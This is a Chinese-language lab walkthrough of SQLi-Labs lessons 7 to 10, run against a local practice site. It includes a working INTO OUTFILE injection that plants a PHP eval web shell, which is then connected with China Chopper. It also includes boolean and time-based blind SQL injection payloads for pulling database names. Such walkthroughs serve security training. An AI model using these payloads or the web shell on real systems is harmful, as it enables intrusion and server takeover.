SQLi-Labs:Less7-Less10

 因为我们用的是phpstudy，所以存在一个文件读写权限问题，我们需要修改一下，首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 当前的值，如果像下图一样显示为NULL（这个必须做，要不然后面一句话木马写不到目录里）

 需要打开 C:phpstudyPHPTutorialMySQLmy.ini文件，在其中加上一句：secure_file_priv="/"

 重启phpstudy，在Mysql命令行重新输入命令

再加个小知识：用到的两个函数：load_file()  读取本地文件  into outfile 写文件    可以百度函数用法，提示路径需要用双斜线

Less 7

我们先输入了?id=1,根据sql语句输出我们可以知道这次是单引号加双括号的字符型注入，闭合方式为?id=1'))    --+

一般查看是否有错误是加单引号，像这一关就是，加了单引号报错，说明存在注入

但是页面显示和前两关不一样，you are in........的后面多了use  outfile........，说明这一关让我们使用outfile函数

 还是自己练手的原因，找到了闭合方式和这熟悉的you are in.......，我忍不住用第五关的方式尝试了一下还是可以的

首先尝试了left（）函数

尝试了ASCII码方式，均可

接下来我们听话use outfile，我们会想到使用 mysql 写文件，eg：写入一句话木马，使用菜刀等工具连接

下面我们将一句话木马写入a.php文件中。。。（存放位置：C:phpStudyPHPTutorialWWWsqli-labs-masterLess-7）

 语句：?id=-1')) union select 1,2, '<?php @eval($_POST["jyx"]); ?>' into outfile 'C:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\zjj.php' --+   （一句话木马里面的jyx是密码）

 如下图所示才叫写入成功

我们先直接进行访问，url：http://localhost/sqli-labs-master/Less-7/zjj.php如下，因为一句话木马是用php写的，在这里没有显示

 下面用中国菜刀开始进行连接，复制上方的url，打开中国菜刀，右键添加，输入链接和上方提到的密码，点击添加

 双击新增条目，成功

 我们就成功拿到了这个网站的webshell

 Less 8

日常先输入?id=1

 加上单引号?id=1'，You are in...消失，说明存在注入漏洞

我们加入注释符号 --+，即?id=1' --+，说明我们要以这样形式进行构造

法一：布尔盲注 

可以查出列数，使用 order by 语句：?id=1' order by 3 --+

 ?id=1' order by 4 --+,可以看出还是3列

 剩下的与第五关的类似，可以用left（）函数，可以用ASCII码方法（猜解速度较慢），还可以用burp suite爆破

法二：时间盲注

小知识：if（）函数——IF(condition,A,B)，如果condition为true，执行A，否则执行B（若在mysql命令行中使用，首先要use ****数据库才行）

首先?id=1' and sleep(5) --+，查看网络，发现存在漏洞并可以采用时间盲注

我们使用if() + length()的组合猜解库名长度，这里页面返回时间正常，所以条件为真，库名长度大于7

?id=1' and if(length(database())>7,1,sleep(5)) --+

 ?id=1' and if(length(database())>8,1,sleep(5)) --+，根据返回时间说明条件为假，结合上面可知库名长度为8

猜库名

 ?id=1' and if(ascii(mid((select database()),1,1))>114,1,sleep(5)) --+

 ?id=1' and if(ascii(mid((select database()),1,1))>115,1,sleep(5)) --+    说明第一个字母的ASCII码值为115，对照表知道为s，以此类推知道后几个字母

 猜其他库的库名，比如第四个库的第一个字母

 ?id=1' and if(ascii(mid((select schema_name from information_schema.schemata limit 3,1),1,1))>108,1,sleep(5)) --+

?id=1' and if(ascii(mid((select schema_name from information_schema.schemata limit 3,1),1,1))>109,1,sleep(5)) --+

 说明这第一个字母是m，经我查证，第四个库是mysql

Less 9

首先?id=1

 再?id=1’

 前面的什么双引号、单括号、双括号都试过，说明无论对错页面都不会产生变化的，所以使用sleep函数试了下

?id=1’ and sleep(5)--+ 使用这个语句时候，网页会停顿5秒，即存在注入漏洞

我们可以使用第8关中的时间盲注进行操作，不可以使用布尔盲注，因为布尔盲注还是根据正确错误有不同的页面呈现的，这里始终页面是不变的；

Less 10

首先继续?id=1

 剩下与第九关相同，我们只要注意闭合方式是双引号的就可以啦